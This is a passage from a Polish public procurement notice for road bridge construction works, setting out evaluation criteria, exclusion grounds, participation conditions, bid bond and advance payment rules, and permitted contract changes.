robót.<br/>22. Dokładny opis przedmiotu zamówienia znajduje się w dokumentach wskazanych w SWZ - Wykonawcy winni<br/>przygotować swoje oferty w oparciu o treść wskazanych tam dokumentów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45221111-3 - Roboty budowlane w zakresie mostów drogowych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Komisja przetargowa oceni oferty sumując punkty uzyskane z poszczególnych kryteriów.<br/>2) Jeżeli Zamawiający nie będzie mógł dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia<br/>taki sam bilans ceny lub kosztu i innych kryteriów oceny ofert, Zamawiający spośród tych ofert wybierze ofertę, która otrzymała<br/>najwyższą ocenę w kryterium o najwyższej wadze.<br/>3) Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybierze ofertę z najniższą ceną lub<br/>najniższym kosztem.<br/>4) Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ppkt. 4, Zamawiający wezwie Wykonawców, którzy złożyli te<br/>oferty, do złożenia w wyznaczonym terminie ofert dodatkowych zawierających nową cenę lub koszt.<br/>5) Wykonawcy, składając oferty dodatkowe, nie mogą zaoferować cen wyższych niż zaoferowane w złożonych ofertach.<br/>6) Komisja przetargowa zaproponuje wybór oferty, która uzyskała najwięcej punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Wykonawcy ubiegający się o udzielenie zamówienia muszą spełniać warunki określone na podstawie art. 112 ustawy z<br/>11 września 2019 r. - Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z póź.zm.), oraz nie mogą podlegać<br/>wykluczeniu z postępowania z powodu okoliczności określonych w art. 108 ust.1 oraz art. 109 ust. 1 pkt 1, 4, 5, 7 i 8 ustawy<br/>z 11 września 2019 r. - Prawo zamówień publicznych (Dz. U. z 2023 r. poz. 1605 z póź.zm.) oraz nie mogą podlegać<br/>wykluczeniu z postępowania na podstawie art. 7 ust.1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w<br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z<br/>2022r poz.835) zwaną dalej „UOBN”.<br/>1.1.Z postępowania o udzielenie zamówienia publicznego wyklucza się Wykonawcę, w stosunku, do którego zachodzi<br/>którakolwiek z okoliczności, o której mowa w:<br/>a) art. 108 ust.1 Pzp;<br/>b) art. 109 ust. 1 pkt. 1,4,5,7, 8 Pzp;<br/>c) art. 7 ust. 1 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu<br/>agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego, (Dz. U. 2022 poz. 835), zwana dalej „UOBN”.<br/>1.2.Zgodnie z art. art. 7 ust. 1 UOBN z postępowania o udzielenie zamówienia zamawiający wyklucza Wykonawcę:<br/>1) wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę<br/>na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 UOBN;<br/>2) którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy<br/>oraz finansowaniu terroryzmu (Dz. U. z 2023 poz.1124 ze zm.) jest osoba wymieniona w wykazach określonych w<br/>rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od<br/>dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o<br/>zastosowaniu środka, o którym mowa w art. 1 pkt 3 UOBN;<br/>3) którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz.<br/>U. z 2023 r. poz. 120 ze zm.), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i<br/>rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został<br/>wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art.<br/>1 pkt 3 UOBN.<br/>1.3. Wykluczenie, o którym mowa w ust. 2 następować będzie na okres trwania w/w okoliczności. W przypadku wykonawcy<br/>lub uczestnika konkursu wykluczonego na podstawie art. 7 ust. 1 UOBN, Zamawiający odrzuca ofertę takiego Wykonawcy.<br/>1.4. Zamawiający będzie weryfikował przesłankę wykluczenia, o której mowa w ust. 9 na podstawie:<br/>1) Wykazów określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014<br/>2) Listy Ministra właściwego do spraw wewnętrznych obejmującej osoby i podmioty, wobec których są stosowane środki, o<br/>których mowa w art. 1 UOBN.<br/>2. Wykonawcy ubiegający się o udzielenie zamówienia muszą:<br/>a) posiadać zdolność do występowania w obrocie gospodarczym, tj.:<br/>- być zarejestrowanymi we właściwym rejestrze lub w centralnej ewidencji i informacji o działalności gospodarczej, jeżeli<br/>odrębne przepisy wymagają wpisu do takiego rejestru lub takiej ewidencji;<br/>b) posiadać uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych<br/>przepisów, tj.:<br/>- Zamawiający nie stawia w tym zakresie warunku udziału w postępowaniu;<br/>c) znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, tj.:<br/>- wykaz dokumentów potwierdzających, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia.<br/>d) posiadać zdolność techniczną lub zawodową, tj.:<br/>- wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat (ilość zamówień należy rozumieć jako<br/>liczbę zawartych umów), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju,<br/>wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem<br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>- wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami; <br/>3. Ocena spełnienia warunków określonych w ppkt. 2 zostanie przez Zamawiającego dokonana poprzez analizę<br/>dokumentów, określonych w pkt. X SWZ, złożonych przez Wykonawców na wezwanie Zamawiającego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)formularz<br/>oferty;2)pełnomocnictwo (jeżeli dotyczy);3)oświadczenie Wykonawcy o braku podstaw wykluczenia z postępowania oraz o<br/>spełnianiu warunków udziału w postępowaniu;4)zobowiązanie podmiotu udostępniającego zasoby;5)oświadczenie o braku<br/>przynależności do grupy kapitałowej;6)odpis lub informację z KRS lub z CEIoDG;7)zaświadczenie właściwego naczelnika<br/>US;8)zaświadczenie ZUS lub KRUS;9)dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 1 000 000,00 zł ;<br/>10) wykaz (co najmniej jednej) robót budowlanych polegających na budowie/ rozbudowie/ przebudowie obiektów mostowych nie<br/>wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich<br/>rodzaju, wartości nie mniejszej niż 1 000 000,00zł każda, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie zgodnie z<br/>załącznikiem do SWZ – w celu potwierdzenia spełnienia wymagania SWZ; Dowodami, o których mowa są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. 11) wykaz osób, skierowanych<br/>przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości<br/>lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami: dysponowanie przynajmniej jedną osobą pełniącą funkcję kierownika robót<br/>budowlanych - posiadającą uprawnienia bez ograniczeń do kierowania robotami budowlanymi w specjalności mostowej (lub<br/>odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów), 12)<br/>dowód wniesienia wadium, 13) dokument, w którym ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – jeżeli dotyczy; 13)<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tego podmiotu oraz potwierdzające, że stosunek łączący Wykonawcę z podmiotem<br/>udostępniającym zasoby gwarantuje rzeczywisty dostęp do tych zasobów – jeżeli dotyczy</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)formularz<br/>oferty;2)pełnomocnictwo (jeżeli dotyczy);3)oświadczenie Wykonawcy o braku podstaw wykluczenia z postępowania oraz o<br/>spełnianiu warunków udziału w postępowaniu;4)zobowiązanie podmiotu udostępniającego zasoby;5)oświadczenie o braku<br/>przynależności do grupy kapitałowej;6)odpis lub informację z KRS lub z CEIoDG;7)zaświadczenie właściwego naczelnika<br/>US;8)zaświadczenie ZUS lub KRUS;9)dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 1 000 000,00 zł ;<br/>10) wykaz (co najmniej jednej) robót budowlanych polegających na budowie/ rozbudowie/ przebudowie obiektów mostowych nie<br/>wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich<br/>rodzaju, wartości nie mniejszej niż 1 000 000,00zł każda, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te<br/>zostały wykonane, oraz załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie zgodnie z<br/>załącznikiem do SWZ – w celu potwierdzenia spełnienia wymagania SWZ; Dowodami, o których mowa są referencje bądź inne<br/>dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. 11) wykaz osób, skierowanych<br/>przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości<br/>lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i<br/>wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz<br/>informacją o podstawie do dysponowania tymi osobami: dysponowanie przynajmniej jedną osobą pełniącą funkcję kierownika robót<br/>budowlanych - posiadającą uprawnienia bez ograniczeń do kierowania robotami budowlanymi w specjalności mostowej (lub<br/>odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów), 12)<br/>dowód wniesienia wadium, 13) dokument, w którym ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – jeżeli dotyczy; 13)<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby<br/>realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie<br/>dysponował niezbędnymi zasobami tego podmiotu oraz potwierdzające, że stosunek łączący Wykonawcę z podmiotem<br/>udostępniającym zasoby gwarantuje rzeczywisty dostęp do tych zasobów – jeżeli dotyczy</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca, którego oferta zostanie wybrana jako najkorzystniejsza przed podpisaniem umowy zobowiązany będzie<br/>dostarczyć Zamawiającemu kosztorys ofertowy przedmiotu zamówienia, który będzie załącznikiem do umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Warunkiem udziału w postępowaniu o udzielenie zamówienia publicznego jest wniesienie wadium w wysokości 18 000,00 zł.<br/>2. Wadium może być wniesione w:<br/>a) pieniądzu,<br/>b) gwarancjach bankowych,<br/>c) gwarancjach ubezpieczeniowych,<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U.2023 poz.462 ze zm.).<br/>3. Wadium w pieniądzu winno zostać wniesione przelewem na rachunek bankowy Zamawiającego. O wniesieniu wadium w<br/>terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego, tj. uznania rachunku<br/>Zamawiającego, która musi nastąpić przed terminem składania ofert.<br/>4. Przelewu należy dokonać na rachunek bankowy podany w pkt I ppkt 2 SWZ.<br/>5. Na poleceniu przelewu (blankiecie wpłaty) należy podać tytuł przelewu: „Wadium postępowanie nr – IP.271.1.6.2024 oraz<br/>podać informację o numerze rachunku bankowego Wykonawcy, na które ma zostać dokonany zwrot wadium.<br/>6. Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci<br/>elektronicznej i spełniać co najmniej poniższe wymagania:<br/>a) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w<br/>ustawie,<br/>b) z jego treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium,<br/>c) winno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie Zamawiającego,<br/>d) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem, iż<br/>pierwszym dniem związania ofertą jest dzień składania ofert).<br/>e) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania (wskazane na<br/>1. stronie SWZ),<br/>f) jako beneficjent gwarancji / poręczenia winien być wskazany Zamawiający,<br/>g) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 ustawy) poręczenie / gwarancja<br/>winno/a obejmować swą treścią wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (tj.<br/>zobowiązanych z tytułu poręczenia / gwarancji), bądź z treści dokumentu winno wynikać, że zabezpiecza ofertę<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum).<br/>7. Oferta Wykonawcy, który nie wniesie wadium, wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium – w przypadku, o którym mowa w art.<br/>98 ust. 2 pkt 3 ustawy – zostanie odrzucona.<br/>8. Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku oferty wspólnej Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do<br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>Wykonawcy ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia.<br/>3. Zgodnie z obowiązującym prawem (w szczególności: art. 860 §1 k.c.) Zamawiający traktuje spółkę cywilną jako stosunek<br/>zobowiązaniowy jej wspólników, a nie odrębny podmiot wyposażony w osobowość prawną, w związku z czym oferta<br/>składana przez wspólników spółki cywilnej musi być sporządzona zgodnie z SWZ oraz zawierać dokumenty (jeżeli są<br/>wymagane na podstawie pkt. X SWZ), odpowiednio:<br/>a) oświadczenie o spełnieniu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania (z<br/>art. 125 ustawy) – złożone przez każdego ze wspólników,<br/>b) oświadczenie o dot. przynależności do grupy kapitałowej (w zakresie art. 108 ust. 1 pkt 5 ustawy) – złożone przez<br/>każdego ze wspólników,<br/>c) zaświadczenie o niezaleganiu w opłacaniu podatków – złożone przez każdego ze wspólników oraz przez spółkę cywilną,<br/>d) zaświadczenie o niezaleganiu w opłacaniu składek – złożone przez każdego ze wspólników oraz przez spółkę cywilną,<br/>e) odpis z ewidencji działalności gospodarczej (CEIDG) – złożony przez każdego ze wspólników.<br/>4. Oferta wspólna składana przez Wykonawców innych niż spółka cywilna musi być sporządzona zgodnie z SWZ oraz<br/>zawierać:<br/>a) oświadczenia (w szczególności z art. 125 i dot. sytuacji z art. 108 ust. 1 pkt 5 ustawy) oraz dokumenty, dotyczące<br/>każdego Wykonawcy, w szczególności: odpis z właściwego rejestru albo zaświadczenie o wpisie do ewidencji działalności<br/>gospodarczej, zaświadczenie właściwego naczelnika urzędu skarbowego, zaświadczenie z właściwego oddziału ZUS,–<br/>składane przez każdego z Wykonawców osobno,<br/>b) wypełniony formularz oferty, oświadczenie, z którego wynika, które elementy zamówienia wykonają poszczególni<br/>członkowie konsorcjum oraz oświadczenia i dokumenty dotyczące spełnienia postawionych przez Zamawiającego warunków<br/>– nie wymienione w lit. a – składane przez pełnomocnika Wykonawców w ich imieniu,<br/>c) pełnomocnictwo, o którym mowa w ppkt. 2.<br/>5. Oferta wraz z załącznikami musi być podpisana przez pełnomocnika Wykonawców.<br/>6. Pełnomocnik Wykonawców pozostaje w kontakcie z Zamawiającym w toku postępowania, zwraca się do Zamawiającego<br/>z wszelkimi sprawami i do niego Zamawiający kieruje oświadczenia, informacje, korespondencję, itp.<br/>7. Wadium, wniesione w formie innej niż gotówka, może być wystawione na wszystkich Wykonawców. W innym wypadku<br/>odpowiedzialność z tytułu przepadku wadium w sytuacjach przewidzianych prawem rozpatrywana będzie w oparciu o<br/>zasadę solidarności, na podstawie przepisów kodeksu cywilnego. 8. Umowa pomiędzy Wykonawcami ustanawiająca konsorcjum powinna zawierać co najmniej:<br/>a) zobowiązanie do realizacji wspólnego przedsięwzięcia gospodarczego obejmującego swoim zakresem przedmiot<br/>zamówienia,<br/>b) wskazanie pełnomocnika do reprezentowania partnerów oraz zakresu jego pełnomocnictwa (czy obejmuje ono także<br/>podpisanie umowy),<br/>c) czas obowiązywania umowy, który nie może być krótszy, niż termin obejmujący realizację zamówienia.<br/>9. Wykonawca, którego ofertę wybrano, zobowiązany jest przedstawić Zamawiającemu – przed zawarciem umowy o<br/>udzielenie zamówienia – umowę, o której mowa w ppkt. 8.<br/>10. Zamawiający uzna za spełnione przez Wykonawców składających ofertę wspólną warunki udziału w postępowaniu na<br/>następujących zasadach:<br/>a) wykonane zamówienia równoważne – Wykonawcy winni spełnić warunek łącznie,<br/>b) dysponowanie osobą z uprawnieniami – Wykonawcy winni spełnić warunek łącznie,<br/>c) polisa OC – Wykonawcy winni spełnić warunek łącznie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1. Zamawiający udzieli Wykonawcy zaliczki na poczet wykonania zamówienia w wysokości 2% wynagrodzenia brutto<br/>należnego wykonawcy.<br/>2. Zaliczka, będzie dokonana przelewem na rachunek wskazany przez wykonawcę (Bank i nr rachunku) nie później niż w<br/>terminie 30 dni od podpisania umowy. Po należytej realizacji zamówienia pozostała wartość wskazana w §7 ust.1 zostanie<br/>wypłacone wykonawcy.<br/>3. Po należytej realizacji zamówienia zaliczka zostaje wliczona w jego cenę.<br/>4. Jeśli umowa zostaje rozwiązana za zgodą obu stron, to Wykonawca zwróci otrzymana zaliczkę w terminie 14 dni licząc od<br/>dnia rozwiązania umowy.<br/>5. Jeśli umowę rozwiąże strona biorąca zaliczkę, jest ona zobowiązana do zwrotu pobranej zaliczki w terminie 14 dni licząc<br/>od dnia rozwiązania umowy.<br/>6. Jeśli umowę rozwiąże strona dająca zaliczkę, może ona domagać się jej zwrotu.<br/>7. Zamawiający żąda od wykonawcy wniesienia zabezpieczenia zaliczki w jednej lub kilku następujących formach:<br/>1) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że zobowiązanie kasy<br/>jest zawsze zobowiązaniem pieniężnym;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości;<br/>5) w wekslach z poręczeniem wekslowym banku lub spółdzielczej kasy oszczędnościowo-kredytowej;<br/>6) przez ustanowienie zastawu na papierach wartościowych emitowanych przez Skarb Państwa lub jednostkę samorządu<br/>terytorialnego;<br/>7) przez ustanowienie zastawu rejestrowego na zasadach określonych w ustawie z dnia 6 grudnia 1996 r. o zastawie<br/>rejestrowym i rejestrze zastawów. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.<br/>2. Umowa może ulec zmianie na zasadach określonych w ustawie z dnia 11 września 2019 r. Prawo zamówień publicznych<br/>(PZP).<br/>3. Zamawiający przewiduje zmianę niniejszej umowy, w szczególności w stosunku do treści oferty Wykonawcy, w<br/>następującym zakresie:<br/>1) wynagrodzenia;<br/>2) terminu wykonania umowy;<br/>3) sposobu realizacji umowy.<br/>Zmiany mogą nastąpić na zasadach określonych w PZP lub w niniejszej umowie.<br/>4. Zamawiający przewiduje możliwość zmiany umowy w następujących przypadkach:<br/>1) wystąpienia okoliczności wskazanych w art. 455 ust. 1 i 2 PZP,<br/>2) konieczności zmiany inspektora nadzoru, kierownika budowy, kierowników robót<br/>w poszczególnych branżach pod warunkiem, że nowe osoby posiadają przynajmniej takie same uprawnienia jak osoby<br/>dotychczasowe i spełniają wymogi SWZ,<br/>3) konieczności zmiany terminu realizacji przedmiotowej umowy w przypadku zmiany przedmiotowej umowy w zakresie<br/>realizacji dodatkowych robót budowlanych, nieobjętych zamówieniem podstawowym, jeżeli stały się niezbędne oraz<br/>spełnione zostały wszystkie warunki wskazane w art. 455 ust. 1 pkt 3 PZP bądź zaistnienia sytuacji skutkującej brakiem<br/>możliwości rozpoczęcia robót z przyczyn leżących po stronie Zamawiającego,<br/>4) w przypadku nieterminowego przekazania Wykonawcy przez Zamawiającego terenu budowy - dopuszcza się wydłużenie terminu wykonania przedmiotu umowy o liczbę dni nieterminowego przekazania terenu budowy,<br/>5) konieczności przedłużenia terminu realizacji przedmiotowej umowy o czas zwłoki, jeżeli zwłoka ta ma lub będzie miała<br/>wpływ na wykonanie przedmiotu umowy, w następujących przypadkach:<br/>a) zawieszenia prowadzenia robót budowlanych przez organy nadzoru budowlanego<br/>z przyczyn niezależnych od Wykonawcy,<br/>b) wykopalisk uniemożliwiających wykonanie robót budowlanych,<br/>c) szczególnie niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót, prób, sprawdzeń bądź<br/>dokonanie odbioru, zgodnie z technologią wykonania robót lub specyfikacją materiałową.<br/>Szczególnie niesprzyjające warunki atmosferyczne uniemożliwiające prowadzenie robót to ciągłe i intensywne opady<br/>deszczu trwające nieprzerwanie powyżej 4 dni w ilości 50 milimetrów słupa wody na godzinę, które uniemożliwią realizację<br/>np.: robót ziemnych, przygotowawczych pod warstwy konstrukcyjne drogi. Wykonawca poinformuje Zamawiającego i<br/>przedłoży dokumenty potwierdzające zaistnienie powyższej okoliczności umożliwiającej zmianę umowy, wskazując termin<br/>wydłużenia realizacji umowy o okres przerwy spowodowanej w/w okolicznościami.<br/>Dokumenty potwierdzające zaistnienie w/w okoliczności powinny być sporządzone przez kierownika budowy i potwierdzone<br/>przez inspektora nadzoru.<br/>d) siły wyższej, klęski żywiołowej,<br/>e) odkrycia na terenie prowadzenia robót budowlanych (lub w bezpośrednim sąsiedztwie) niewypałów bądź niewybuchów i<br/>konieczności ich usunięcia przez wyspecjalizowane służby,<br/>f) odkrycia na terenie prowadzenia robót budowlanych obiektów archeologicznych nieprzewidzianych w SWZ i konieczności<br/>ich zinwentaryzowania / zabezpieczenia, etc.,<br/>g) wystąpienia odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych (w szczególności kategorii<br/>gruntu, kurzawki) bądź terenowych<br/>(w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych),<br/>i) wystąpienia okoliczności wskazanych w pkt. 6 – 9,<br/>6) wstrzymania przez Zamawiającego robót budowlanych, w celu usunięcia błędów lub wprowadzenia zmian w<br/>dokumentacji 